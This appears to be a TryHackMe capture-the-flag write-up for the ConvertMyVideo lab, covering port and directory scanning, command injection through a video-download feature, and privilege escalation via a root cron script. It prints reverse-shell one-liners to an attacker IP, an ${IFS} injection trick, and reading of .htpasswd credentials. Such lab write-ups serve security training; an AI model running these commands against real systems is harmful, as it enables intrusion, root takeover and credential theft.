Buy me a tea

TryHackMe - ConvertMyVideo

Nmap

Starting Nmap 7.60 ( https://nmap.org ) at 2022-07-05 21:48 BST
Stats: 0:20:37 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 22:09 (0:00:00 remaining)
Nmap scan report for ip-10-10-68-80.eu-west-1.compute.internal (10.10.68.80)
Host is up (0.00047s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
|   256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
|_  256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 02:61:5C:CF:D0:3B (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=7/5%OT=22%CT=1%CU=34666%PV=Y%DS=1%DC=D%G=Y%M=02615C%TM
OS:=62C4A916%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=Z%TS=A)
OS:SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M230
OS:1ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)W
OS:IN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F
OS:507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)
OS:T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1381.76 seconds

Port 80

Gobuster

┌──(root💀kali)-[/home/kali/Documents]
└─# gobuster dir -u http://10.10.158.186/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt                                                                                                            1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.158.186/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/07/06 17:18:46 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 315] [--> http://10.10.158.186/images/]
/admin                (Status: 401) [Size: 460]                                   
/js                   (Status: 301) [Size: 311] [--> http://10.10.158.186/js/]    
/tmp                  (Status: 301) [Size: 312] [--> http://10.10.158.186/tmp/]

Apache version

  • Apache httpd 2.4.29 - CVE-2021-41773

  • https://github.com/iilegacyyii/PoC-CVE-2021-41773

  • Not going anywhere with this

The dl functionality

  • First I inspected on burp the request. Sent it to my repeater and played with it a little

  • Here are the interesting elements of the response

Unable to download webpage: HTTP Error 401: Unauthorized (caused by HTTPError()); please report this issue on https:\/\/yt-dl.org\/bug . Make sure you are using the latest version; type  youtube-dl -U  to update. Be sure to call youtube-dl with the --verbose flag and include its complete output
"result_url":"\/tmp\/downloads\/62d2fd72c199c.mp3

  • According to this it is using a binary called youtube-dl and put the converted video to a downloads folder in /tmp

  • We can check youtube-dl documentation for more info

  • We can still get our user flag this way though, as we saw it listed with the previous command that worked cat${IFS}admin/flag.txt

  • Let's try to get a reverse shell all the one liners with reverse have dash sign in them. let's see if we can wget a homemade file with a oneliner shell in it and execute it afterwards.

  • We make a file called oneliner.sh and put this in it

bash -i >& /dev/tcp/ATTACKING-MACHINE-IP/4444 0>&1

  • Replace the script with your IP

  • And we laucnh our python http server in the folder where our shell is

  • let's stabilize our shell python3 -c 'import pty; pty.spawn("/bin/bash")'

  • Let's try to overwrite clean.sh

Privesc

  • If we execute linpeas on the target we see that cron is running as root.

  • Let's get pspy in our target and execute it

bash /var/www/html/tmp/clean.sh 
/bin/sh -c cd /var/www/html/tmp && bash /var/www/html/tmp/clean.sh 
/usr/sbin/CRON -f

  • The clean is just an rm -rf downloads

  • Let's launch a listener rlwrap nc -lvp 5555

  • echo "bash -i >& /dev/tcp/10.13.22.56/5555 0>&1" > /var/www/html/tmp/clean.sh

Questions

  • What is the name of the secret folder? admin (we get this using gobuster, see above)

  • What is the user to access the secret folder? to know this we need to do this one we have our reverse shell cat admin/.htpasswd we will get the user and password inside this file.

  • I let you find the flags on your own :)

PreviousTryHackMe - CMesSNextTryHackMe - Corridor

Last updated